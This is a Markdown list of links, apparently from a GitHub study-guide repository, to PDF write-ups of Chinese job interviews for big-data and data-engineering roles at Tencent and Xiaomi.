-[9.20-腾讯云智-数据-二面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/9.20-%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA-%E6%95%B0%E6%8D%AE-%E4%BA%8C%E9%9D%A2.pdf) -[【腾讯】后端开发暑期实习面经(已offer)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E3%80%90%E8%85%BE%E8%AE%AF%E3%80%91%E5%90%8E%E7%AB%AF%E5%BC%80%E5%8F%91%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F%EF%BC%88%E5%B7%B2offer%EF%BC%89.pdf) -[一面凉经-腾讯技术研究-数据科学](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F-%E8%85%BE%E8%AE%AF%E6%8A%80%E6%9C%AF%E7%A0%94%E7%A9%B6-%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6.pdf) -[大数据开发实习面经(阿里、360、腾讯)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F%EF%BC%88%E9%98%BF%E9%87%8C%E3%80%81360%E3%80%81%E8%85%BE%E8%AE%AF%EF%BC%89.pdf) -[奇怪的csig数据工程timeline](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E5%A5%87%E6%80%AA%E7%9A%84csig%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8Btimeline.pdf) -[字节腾讯大数据凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E5%AD%97%E8%8A%82%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%87%89%E7%BB%8F.pdf) -[百度腾讯提前批阿里校招面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E7%99%BE%E5%BA%A6%E8%85%BE%E8%AE%AF%E6%8F%90%E5%89%8D%E6%89%B9%E9%98%BF%E9%87%8C%E6%A0%A1%E6%8B%9B%E9%9D%A2%E7%BB%8F.pdf) -[腾讯 TEG 后台开发 大数据方向 一面总结](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20TEG%20%E5%90%8E%E5%8F%B0%E5%BC%80%E5%8F%91%20%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%96%B9%E5%90%91%20%E4%B8%80%E9%9D%A2%E6%80%BB%E7%BB%93.pdf) -[腾讯 偏大数据开发三面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E5%81%8F%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%89%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯 偏大数据开发二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E5%81%8F%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯 偏大数据开发一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E5%81%8F%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯 数据科学暑期实习 一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%20%E4%B8%80%E9%9D%A2.pdf) -[腾讯-数据科学(IEG)+数据工程](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF-%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%EF%BC%88IEG%EF%BC%89%2B%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B.pdf) -[腾讯CSIG后台开发一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFCSIG%E5%90%8E%E5%8F%B0%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯CSIG大数据一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFCSIG%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯IEG数据中心实习面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFIEG%E6%95%B0%E6%8D%AE%E4%B8%AD%E5%BF%83%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F.pdf) -[腾讯PCG数据研发暑期实习一���凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFPCG%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) -[腾讯TEG-数据平台部-大数据开发实习-一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFTEG-%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E9%83%A8-%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0-%E4%B8%80%E9%9D%A2.pdf) -[腾讯TEG-数据平台部-大数据开发实习-二面(等凉)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFTEG-%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E9%83%A8-%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0-%E4%BA%8C%E9%9D%A2%EF%BC%88%E7%AD%89%E5%87%89%EF%BC%89.pdf) -[腾讯TEG大数据一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFTEG%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯teg大数据 凉](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFteg%E5%A4%A7%E6%95%B0%E6%8D%AE%20%E5%87%89.pdf) -[腾讯云智 数据工程 面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA%20%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%20%E9%9D%A2%E7%BB%8F.pdf) -[腾讯云智暑期实习-数据工程 一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0-%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%20%E4%B8%80%E9%9D%A2.pdf) -[腾讯大数据开发一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) -[腾讯大数据开发实习](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0.pdf) -[腾讯微保实习一面(数据开发工程师)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%BE%AE%E4%BF%9D%E5%AE%9E%E4%B9%A0%E4%B8%80%E9%9D%A2%EF%BC%88%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%EF%BC%89.pdf) -[腾讯微保实习二面(数据开发工程师)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%BE%AE%E4%BF%9D%E5%AE%9E%E4%B9%A0%E4%BA%8C%E9%9D%A2%EF%BC%88%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%EF%BC%89.pdf) -[腾讯微信读书 数据科学 暑期实习 一面【放弃笔试但被捞】](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%BE%AE%E4%BF%A1%E8%AF%BB%E4%B9%A6%20%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%20%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%20%E4%B8%80%E9%9D%A2%E3%80%90%E6%94%BE%E5%BC%83%E7%AC%94%E8%AF%95%E4%BD%86%E8%A2%AB%E6%8D%9E%E3%80%91.pdf) -[腾讯数开面筋-全程无八股](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E5%BC%80%E9%9D%A2%E7%AD%8B-%E5%85%A8%E7%A8%8B%E6%97%A0%E5%85%AB%E8%82%A1.pdf) -[腾讯数据工程凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E5%87%89%E7%BB%8F.pdf) -[腾讯数据工程面经(1)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E9%9D%A2%E7%BB%8F%EF%BC%881%EF%BC%89.pdf) -[腾讯数据工程面经(2)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E9%9D%A2%E7%BB%8F%EF%BC%882%EF%BC%89.pdf) -[腾讯暑期实习 数据科学一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%20%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯秋招大数据运维开发一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E7%A7%8B%E6%8B%9B%E5%A4%A7%E6%95%B0%E6%8D%AE%E8%BF%90%E7%BB%B4%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2.pdf) -[阿里、腾讯大数据提前批面经(已拿offer)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E9%98%BF%E9%87%8C%E3%80%81%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%8F%90%E5%89%8D%E6%89%B9%E9%9D%A2%E7%BB%8F(%E5%B7%B2%E6%8B%BFoffer).pdf) -[面试复盘|腾讯-腾讯大数据 一面凉经!!!](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E9%9D%A2%E8%AF%95%E5%A4%8D%E7%9B%98%EF%BD%9C%E8%85%BE%E8%AE%AF-%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%20%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F%EF%BC%81%EF%BC%81%EF%BC%81.pdf) - - -#### 小米面经 -[2023-3-27 小米-汽车-大数据开发](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/2023-3-27%20%E5%B0%8F%E7%B1%B3-%E6%B1%BD%E8%BD%A6-%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91-1.pdf) -[小米 大数据 一面 二面(凉经)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E5%A4%A7%E6%95%B0%E6%8D%AE%20%E4%B8%80%E9%9D%A2%20%E4%BA%8C%E9%9D%A2%EF%BC%88%E5%87%89%E7%BB%8F%EF%BC%89.pdf) -[小米 大数据开发 一面视频面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E4%B8%80%E9%9D%A2%E8%A7%86%E9%A2%91%E9%9D%A2.pdf) -[小米 大数据开发 已oc](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E5%B7%B2oc.pdf) -[小米、头条、知乎面试题总结](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E3%80%81%E5%A4%B4%E6%9D%A1%E3%80%81%E7%9F%A5%E4%B9%8E%E9%9D%A2%E8%AF%95%E9%A2%98%E6%80%BB%E7%BB%93_%E4%B8%8D%E6%B8%85%E4%B8%8D%E6%85%8E%E7%9A%84%E5%8D%9A%E5%AE%A2-CSDN%E5%8D%9A%E5%AE%A2.pdf) -[小米凉面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%87%89%E9%9D%A2.pdf) -[小米大数据一二面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E4%BA%8C%E9%9D%A2.pdf) -[小米大数据一二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[小米大数据一二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F02.pdf) -[小米大数据开发一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2.pdf) -[小米大数据开发一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) -[小米大数据开发二面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[小米大数据开发实习面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F.pdf) -[小米大数据开发岗一面、二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B2%97%E4%B8%80%E9%9D%A2%E3%80%81%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[小米大数据开发工程师(base北京)已OC](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%EF%BC%88base%E5%8C%97%E4%BA%AC%EF%BC%89%E5%B7%B2OC.pdf) 